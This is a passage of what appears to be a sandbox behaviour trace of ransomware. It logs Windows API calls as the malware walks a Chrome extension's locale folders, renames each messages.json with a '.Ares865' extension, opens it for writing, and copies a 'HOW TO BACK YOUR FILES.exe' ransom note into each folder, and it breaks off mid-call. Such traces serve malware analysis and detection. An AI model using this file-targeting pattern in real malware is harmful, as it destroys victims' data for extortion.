[0101.385] lstrlenW (lpString="messages.json") returned 13 [0101.385] lstrlenW (lpString="Ares865") returned 7 [0101.385] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.386] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.Ares865") returned 164 [0101.386] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.387] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.387] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=673) returned 1 [0101.392] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et" [0101.393] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et" [0101.393] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.393] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.393] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.394] GetLastError () returned 0x0 [0101.394] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.394] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826ff400, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e54d9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e54d9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.394] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.394] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.394] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.394] lstrlenW (lpString="messages.json") returned 13 [0101.394] lstrlenW (lpString="Ares865") returned 7 [0101.394] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.394] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.Ares865") returned 164 [0101.394] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.396] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.396] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=609) returned 1 [0101.399] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419" [0101.399] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419" [0101.399] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.399] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.400] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.400] GetLastError () returned 0x0 [0101.400] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.400] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826f30b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e573b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e573b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.401] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.401] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.401] lstrcpyW (in: lpString1=0x2cce526, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.401] lstrlenW (lpString="messages.json") returned 13 [0101.401] lstrlenW (lpString="Ares865") returned 7 [0101.401] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.401] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.Ares865") returned 168 [0101.401] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.402] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.403] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=667) returned 1 [0101.407] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es" [0101.408] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es" [0101.408] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.408] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.408] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.409] GetLastError () returned 0x0 [0101.409] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.409] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826e9470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e573b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e573b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.409] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.409] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.409] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.409] lstrlenW (lpString="messages.json") returned 13 [0101.409] lstrlenW (lpString="Ares865") returned 7 [0101.409] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.409] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.Ares865") returned 164 [0101.409] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.411] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.411] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=696) returned 1 [0101.414] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB" [0101.414] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB" [0101.414] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.414] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.414] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.415] GetLastError () returned 0x0 [0101.415] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.415] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826d8300, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e573b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e573b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.415] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.415] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.415] lstrcpyW (in: lpString1=0x2cce524, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.415] lstrlenW (lpString="messages.json") returned 13 [0101.415] lstrlenW (lpString="Ares865") returned 7 [0101.415] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.416] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.Ares865") returned 167 [0101.416] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.417] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.417] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=617) returned 1 [0101.421] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en" [0101.421] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en" [0101.421] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.421] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.421] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.422] GetLastError () returned 0x0 [0101.422] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.422] FindFirstFileW (in: 